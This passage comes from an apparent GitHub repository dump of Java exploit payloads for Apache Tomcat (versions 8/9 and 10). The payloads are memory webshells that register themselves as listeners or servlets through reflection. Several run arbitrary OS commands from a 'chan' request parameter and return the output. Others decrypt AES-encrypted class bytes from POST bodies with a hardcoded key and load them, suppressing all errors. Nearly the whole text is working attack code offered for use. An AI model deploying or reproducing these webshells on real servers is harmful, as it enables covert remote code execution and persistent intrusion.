62 | }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
63 | Class Lclass = cl.getClass().getSuperclass().getSuperclass();
64 | RushThere(Lclass,cl,session,request,pageContext);
65 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
66 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
67 | RushThere(Lclass,cl,session,request,pageContext);
68 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
69 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
70 | RushThere(Lclass,cl,session,request,pageContext);
71 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
72 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
73 | RushThere(Lclass,cl,session,request,pageContext);
74 | }else {
75 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
76 | RushThere(Lclass,cl,session,request,pageContext);
77 | }
78 | }
79 | }catch(Exception ig){
80 | //ig.printStackTrace();
81 | }
82 | }
83 |
84 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map pageContext){
85 | byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
86 | try {
87 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
88 | define.setAccessible(true);
89 | Class uclass = null;
90 | try {
91 | uclass = cl.loadClass("U");
92 | } catch (ClassNotFoundException e) {
93 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
94 | }
95 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
96 | constructor.setAccessible(true);
97 | Object u = constructor.newInstance(this.getClass().getClassLoader());
98 | Method Um = uclass.getDeclaredMethod("g", byte[].class);
99 | Um.setAccessible(true);
100 | String k = pa;
101 | session.setAttribute("u", k);
102 | Cipher c = Cipher.getInstance("AES");
103 | c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
104 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
105 | Class eclass = (Class) Um.invoke(u, eClassBytes);
106 | Object a = eclass.newInstance();
107 | Method b = eclass.getDeclaredMethod("equals", Object.class);
108 | b.setAccessible(true);
109 | b.invoke(a, pageContext);
110 | return;
111 | }catch (Exception ig){
112 | //ig.printStackTrace();
113 | }
114 | }
115 | }
116 |
117 |
118 |
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat10/LRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat10/LRain10.class
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat10/LRain10.java:
--------------------------------------------------------------------------------
1 | import jakarta.servlet.ServletRequestEvent;
2 | import jakarta.servlet.ServletRequestListener;
3 |
4 | import org.apache.catalina.connector.Request;
5 | import org.apache.catalina.connector.RequestFacade;
6 | import org.apache.catalina.connector.Response;
7 | import org.apache.catalina.core.StandardContext;
8 | import org.apache.catalina.loader.WebappClassLoaderBase;
9 | import java.lang.reflect.Field;
10 | import java.lang.reflect.Method;
11 |
12 | public class LRain10 implements ServletRequestListener {
13 |
14 | static {
15 | try {
16 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
17 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
18 |
19 | LRain10 servletRequestListener = new LRain10();
20 | Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class);
21 | addlistener.invoke(standardContext,servletRequestListener);
22 |
23 | } catch (Exception hi) {
24 | //hi.printStackTrace();
25 | }
26 | }
27 |
28 |
29 | @Override
30 | public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
31 |
32 | }
33 | @Override
34 | public void requestInitialized(ServletRequestEvent servletRequestEvent) {
35 | try{
36 | RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
37 | Field field = requestfacade.getClass().getDeclaredField("request");
38 | field.setAccessible(true);
39 | Request lrequest = (Request) field.get(requestfacade);
40 | Response lresponse = lrequest.getResponse();
41 |
42 | if(lrequest.getParameter("chan") != null){
43 | Process process = Runtime.getRuntime().exec(lrequest.getParameter("chan"));
44 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
45 | new java.io.InputStreamReader(process.getInputStream()));
46 | StringBuilder stringBuilder = new StringBuilder();
47 | String line;
48 | while ((line = bufferedReader.readLine()) != null) {
49 | stringBuilder.append(line + '\n');
50 | }
51 | lresponse.getOutputStream().write(stringBuilder.toString().getBytes());
52 | lresponse.getOutputStream().flush();
53 | lresponse.getOutputStream().close();
54 | return;
55 | }
56 | }catch(Exception ig){
57 | ig.printStackTrace();
58 | }
59 | }
60 | }
61 |
62 |
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/ILRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat89/ILRain.class
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/ILRain.java:
--------------------------------------------------------------------------------
1 | import org.apache.catalina.connector.Request;
2 | import org.apache.catalina.connector.RequestFacade;
3 | import org.apache.catalina.connector.Response;
4 | import org.apache.catalina.core.StandardContext;
5 | import org.apache.catalina.loader.WebappClassLoaderBase;
6 |
7 | import javax.crypto.Cipher;
8 | import javax.crypto.spec.SecretKeySpec;
9 | import javax.servlet.ServletRequestEvent;
10 | import javax.servlet.ServletRequestListener;
11 | import javax.servlet.http.HttpServletRequest;
12 | import javax.servlet.http.HttpSession;
13 | import java.lang.reflect.Constructor;
14 | import java.lang.reflect.Field;
15 | import java.lang.reflect.Method;
16 | import java.util.HashMap;
17 | import java.util.Map;
18 |
19 | public class ILRain implements ServletRequestListener {
20 | private final String pa = "3ad2fddfe8bad8e6";
21 |
22 | static {
23 | try {
24 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
25 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
26 |
27 | ILRain servletRequestListener = new ILRain();
28 | Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class);
29 | addlistener.invoke(standardContext,servletRequestListener);
30 |
31 | } catch (Exception hi) {
32 | //hi.printStackTrace();
33 | }
34 | }
35 |
36 |
37 | @Override
38 | public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
39 |
40 | }
41 | @Override
42 | public void requestInitialized(ServletRequestEvent servletRequestEvent) {
43 | try{
44 | RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
45 | Field field = requestfacade.getClass().getDeclaredField("request");
46 | field.setAccessible(true);
47 | Request request = (Request) field.get(requestfacade);
48 | Response response = request.getResponse();
49 | HttpSession session = request.getSession();
50 |
51 | Map pageContext = new HashMap();
52 | pageContext.put("session", session);
53 | pageContext.put("request", request);
54 | pageContext.put("response", response);
55 |
56 | ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();
57 |
58 | if (request.getMethod().equals("POST")){
59 | if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
60 | Class Lclass = cl.getClass().getSuperclass();
61 | RushThere(Lclass,cl,session,request,pageContext);
62 | }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
63 | Class Lclass = cl.getClass().getSuperclass().getSuperclass();
64 | RushThere(Lclass,cl,session,request,pageContext);
65 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
66 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
67 | RushThere(Lclass,cl,session,request,pageContext);
68 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
69 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
70 | RushThere(Lclass,cl,session,request,pageContext);
71 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
72 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
73 | RushThere(Lclass,cl,session,request,pageContext);
74 | }else {
75 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
76 | RushThere(Lclass,cl,session,request,pageContext);
77 | }
78 | }
79 | }catch(Exception ig){
80 | //ig.printStackTrace();
81 | }
82 | }
83 |
84 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map pageContext){
85 | byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
86 | try {
87 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
88 | define.setAccessible(true);
89 | Class uclass = null;
90 | try {
91 | uclass = cl.loadClass("U");
92 | } catch (ClassNotFoundException e) {
93 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
94 | }
95 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
96 | constructor.setAccessible(true);
97 | Object u = constructor.newInstance(this.getClass().getClassLoader());
98 | Method Um = uclass.getDeclaredMethod("g", byte[].class);
99 | Um.setAccessible(true);
100 | String k = pa;
101 | session.setAttribute("u", k);
102 | Cipher c = Cipher.getInstance("AES");
103 | c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
104 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
105 | Class eclass = (Class) Um.invoke(u, eClassBytes);
106 | Object a = eclass.newInstance();
107 | Method b = eclass.getDeclaredMethod("equals", Object.class);
108 | b.setAccessible(true);
109 | b.invoke(a, pageContext);
110 | return;
111 | }catch (Exception ig){
112 | //ig.printStackTrace();
113 | }
114 | }
115 | }
116 |
117 |
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/LRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat89/LRain.class
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/LRain.java:
--------------------------------------------------------------------------------
1 | import org.apache.catalina.connector.Request;
2 | import org.apache.catalina.connector.RequestFacade;
3 | import org.apache.catalina.connector.Response;
4 | import org.apache.catalina.core.StandardContext;
5 | import org.apache.catalina.loader.WebappClassLoaderBase;
6 |
7 | import javax.servlet.ServletRequestEvent;
8 | import javax.servlet.ServletRequestListener;
9 | import java.lang.reflect.Field;
10 | import java.lang.reflect.Method;
11 |
12 | public class LRain implements ServletRequestListener {
13 |
14 | static {
15 | try {
16 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
17 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
18 |
19 | LRain servletRequestListener = new LRain();
20 | Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class);
21 | addlistener.invoke(standardContext,servletRequestListener);
22 |
23 | } catch (Exception hi) {
24 | //hi.printStackTrace();
25 | }
26 | }
27 |
28 |
29 | @Override
30 | public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
31 |
32 | }
33 | @Override
34 | public void requestInitialized(ServletRequestEvent servletRequestEvent) {
35 | try{
36 | RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
37 | Field field = requestfacade.getClass().getDeclaredField("request");
38 | field.setAccessible(true);
39 | Request lrequest = (Request) field.get(requestfacade);
40 | Response lresponse = lrequest.getResponse();
41 |
42 | if(lrequest.getParameter("chan") != null){
43 | Process process = Runtime.getRuntime().exec(lrequest.getParameter("chan"));
44 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
45 | new java.io.InputStreamReader(process.getInputStream()));
46 | StringBuilder stringBuilder = new StringBuilder();
47 | String line;
48 | while ((line = bufferedReader.readLine()) != null) {
49 | stringBuilder.append(line + '\n');
50 | }
51 | lresponse.getOutputStream().write(stringBuilder.toString().getBytes());
52 | lresponse.getOutputStream().flush();
53 | lresponse.getOutputStream().close();
54 | return;
55 | }
56 | }catch(Exception ig){
57 | ig.printStackTrace();
58 | }
59 | }
60 | }
61 |
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/ISRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat10/ISRain10.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/ISRain10.java:
--------------------------------------------------------------------------------
1 | import jakarta.servlet.*;
2 | import jakarta.servlet.http.HttpServletRequest;
3 | import jakarta.servlet.http.HttpServletResponse;
4 | import jakarta.servlet.http.HttpSession;
5 | import org.apache.catalina.Container;
6 | import org.apache.catalina.Wrapper;
7 | import org.apache.catalina.core.StandardContext;
8 | import org.apache.catalina.loader.WebappClassLoaderBase;
9 |
10 | import javax.crypto.Cipher;
11 | import javax.crypto.spec.SecretKeySpec;
12 | import java.io.IOException;
13 | import java.lang.reflect.Constructor;
14 | import java.lang.reflect.Method;
15 | import java.util.HashMap;
16 | import java.util.Map;
17 |
18 | public class ISRain10 implements Servlet {
19 | private final String pa = "3ad2fddfe8bad8e6";
20 |
21 | static{
22 | try{
23 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
24 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
25 |
26 | ISRain10 greetServlet = new ISRain10();
27 |
28 | Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
29 | Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);
30 |
31 | Method gname = Container.class.getDeclaredMethod("setName", String.class);
32 | gname.invoke(greetWrapper,"p");
33 |
34 | Method gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
35 | gload.invoke(greetWrapper,1);
36 |
37 | Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
38 | gservlet.invoke(greetWrapper,greetServlet);
39 |
40 | Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
41 | gclass.invoke(greetWrapper,greetServlet.getClass().getName());
42 |
43 | Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
44 | gchild.invoke(standardContext,greetWrapper);
45 |
46 | Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
47 | gmap.invoke(standardContext,"/p", "p",false);
48 | }catch (Exception hi){
49 | //hi.printStackTrace();
50 | }
51 | }
52 |
53 | @Override
54 | public void init(ServletConfig config) throws ServletException {}
55 |
56 | @Override
57 | public String getServletInfo() {return null;}
58 |
59 | @Override
60 | public void destroy() {} public ServletConfig getServletConfig() {return null;}
61 |
62 | @Override
63 | public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
64 | HttpServletRequest request = (HttpServletRequest) servletRequest;
65 | HttpServletResponse response = (HttpServletResponse) servletResponse;
66 | HttpSession session = request.getSession();
67 |
68 | Map pageContext = new HashMap();
69 | pageContext.put("session", session);
70 | pageContext.put("request", request);
71 | pageContext.put("response", response);
72 |
73 | ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();
74 |
75 | if (request.getMethod().equals("POST")){
76 | if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
77 | Class Lclass = cl.getClass().getSuperclass();
78 | RushThere(Lclass,cl,session,request,pageContext);
79 | }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
80 | Class Lclass = cl.getClass().getSuperclass().getSuperclass();
81 | RushThere(Lclass,cl,session,request,pageContext);
82 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
83 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
84 | RushThere(Lclass,cl,session,request,pageContext);
85 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
86 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
87 | RushThere(Lclass,cl,session,request,pageContext);
88 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
89 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
90 | RushThere(Lclass,cl,session,request,pageContext);
91 | }else {
92 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
93 | RushThere(Lclass,cl,session,request,pageContext);
94 | }
95 | }
96 | }
97 |
98 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){
99 | byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
100 | try {
101 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
102 | define.setAccessible(true);
103 | Class uclass = null;
104 | try {
105 | uclass = cl.loadClass("U");
106 | } catch (ClassNotFoundException e) {
107 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
108 | }
109 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
110 | constructor.setAccessible(true);
111 | Object u = constructor.newInstance(this.getClass().getClassLoader());
112 | Method Um = uclass.getDeclaredMethod("g", byte[].class);
113 | Um.setAccessible(true);
114 | String k = pa;
115 | session.setAttribute("u", k);
116 | Cipher c = Cipher.getInstance("AES");
117 | c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
118 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
119 | Class eclass = (Class) Um.invoke(u, eClassBytes);
120 | Object a = eclass.newInstance();
121 | Method b = eclass.getDeclaredMethod("equals", Object.class);
122 | b.setAccessible(true);
123 | b.invoke(a, pageContext);
124 | return;
125 | }catch (Exception ig){
126 | ig.printStackTrace();
127 | }
128 | }
129 | }
130 |
131 |
132 |
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/SRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat10/SRain10.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/SRain10.java:
--------------------------------------------------------------------------------
1 | import jakarta.servlet.*;
2 | import jakarta.servlet.http.HttpServletRequest;
3 | import jakarta.servlet.http.HttpServletResponse;
4 | import org.apache.catalina.Container;
5 | import org.apache.catalina.Wrapper;
6 | import org.apache.catalina.core.StandardContext;
7 | import org.apache.catalina.loader.WebappClassLoaderBase;
8 |
9 | import java.io.IOException;
10 | import java.lang.reflect.Method;
11 |
12 | public class SRain10 implements Servlet {
13 |
14 | static{
15 | try{
16 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
17 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
18 |
19 | SRain10 greetServlet = new SRain10();
20 |
21 | Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
22 | Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);
23 |
24 | Method gname = Container.class.getDeclaredMethod("setName", String.class);
25 | gname.invoke(greetWrapper,"p");
26 |
27 | Method gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
28 | gload.invoke(greetWrapper,1);
29 |
30 | Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
31 | gservlet.invoke(greetWrapper,greetServlet);
32 |
33 | Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
34 | gclass.invoke(greetWrapper,greetServlet.getClass().getName());
35 |
36 | Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
37 | gchild.invoke(standardContext,greetWrapper);
38 |
39 | Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
40 | gmap.invoke(standardContext,"/p", "p",false);
41 | }catch (Exception hi){
42 | //hi.printStackTrace();
43 | }
44 | }
45 |
46 | @Override
47 | public void init(ServletConfig config) throws ServletException {}
48 |
49 | @Override
50 | public String getServletInfo() {return null;}
51 |
52 | @Override
53 | public void destroy() {} public ServletConfig getServletConfig() {return null;}
54 |
55 | @Override
56 | public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
57 | HttpServletRequest req = (HttpServletRequest) servletRequest;
58 | HttpServletResponse resp = (HttpServletResponse) servletResponse;
59 | if (req.getParameter("chan") != null){
60 | Process process = Runtime.getRuntime().exec(req.getParameter("chan"));
61 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
62 | new java.io.InputStreamReader(process.getInputStream()));
63 | StringBuilder stringBuilder = new StringBuilder();
64 | String line;
65 | while ((line = bufferedReader.readLine()) != null) {
66 | stringBuilder.append(line + '\n');
67 | }
68 | resp.getOutputStream().write(stringBuilder.toString().getBytes());
69 | resp.getOutputStream().flush();
70 | resp.getOutputStream().close();
71 | return;
72 | }
73 | else{
74 | resp.sendError(HttpServletResponse.SC_NOT_FOUND);
75 | }
76 | }
77 | }
78 |
79 |
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/ISRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat89/ISRain.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/ISRain.java:
--------------------------------------------------------------------------------
1 | import org.apache.catalina.Container;
2 | import org.apache.catalina.Wrapper;
3 | import org.apache.catalina.core.StandardContext;
4 | import org.apache.catalina.loader.WebappClassLoaderBase;
5 |
6 | import javax.crypto.Cipher;
7 | import javax.crypto.spec.SecretKeySpec;
8 | import javax.servlet.*;
9 | import javax.servlet.http.HttpServletRequest;
10 | import javax.servlet.http.HttpServletResponse;
11 | import javax.servlet.http.HttpSession;
12 | import java.io.IOException;
13 | import java.lang.reflect.Constructor;
14 | import java.lang.reflect.Method;
15 | import java.util.HashMap;
16 | import java.util.Map;
17 |
18 | public class ISRain implements Servlet {
19 | private final String pa = "3ad2fddfe8bad8e6";
20 |
21 | static{
22 | try{
23 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
24 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
25 |
26 | ISRain greetServlet = new ISRain();
27 |
28 | Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
29 | Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);
30 |
31 | Method gname = Container.class.getDeclaredMethod("setName", String.class);
32 | gname.invoke(greetWrapper,"p");
33 |
34 | Method gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
35 | gload.invoke(greetWrapper,1);
36 |
37 | Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
38 | gservlet.invoke(greetWrapper,greetServlet);
39 |
40 | Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
41 | gclass.invoke(greetWrapper,greetServlet.getClass().getName());
42 |
43 | Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
44 | gchild.invoke(standardContext,greetWrapper);
45 |
46 | Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
47 | gmap.invoke(standardContext,"/p", "p",false);
48 | }catch (Exception hi){
49 | //hi.printStackTrace();
50 | }
51 | }
52 |
53 | @Override
54 | public void init(ServletConfig config) throws ServletException {}
55 |
56 | @Override
57 | public String getServletInfo() {return null;}
58 |
59 | @Override
60 | public void destroy() {} public ServletConfig getServletConfig() {return null;}
61 |
62 | @Override
63 | public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
64 | HttpServletRequest request = (HttpServletRequest) servletRequest;
65 | HttpServletResponse response = (HttpServletResponse) servletResponse;
66 | HttpSession session = request.getSession();
67 |
68 | Map pageContext = new HashMap();
69 | pageContext.put("session", session);
70 | pageContext.put("request", request);
71 | pageContext.put("response", response);
72 |
73 | ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();
74 |
75 | if (request.getMethod().equals("POST")){
76 | if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
77 | Class Lclass = cl.getClass().getSuperclass();
78 | RushThere(Lclass,cl,session,request,pageContext);
79 | }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
80 | Class Lclass = cl.getClass().getSuperclass().getSuperclass();
81 | RushThere(Lclass,cl,session,request,pageContext);
82 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
83 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
84 | RushThere(Lclass,cl,session,request,pageContext);
85 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
86 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
87 | RushThere(Lclass,cl,session,request,pageContext);
88 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
89 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
90 | RushThere(Lclass,cl,session,request,pageContext);
91 | }else {
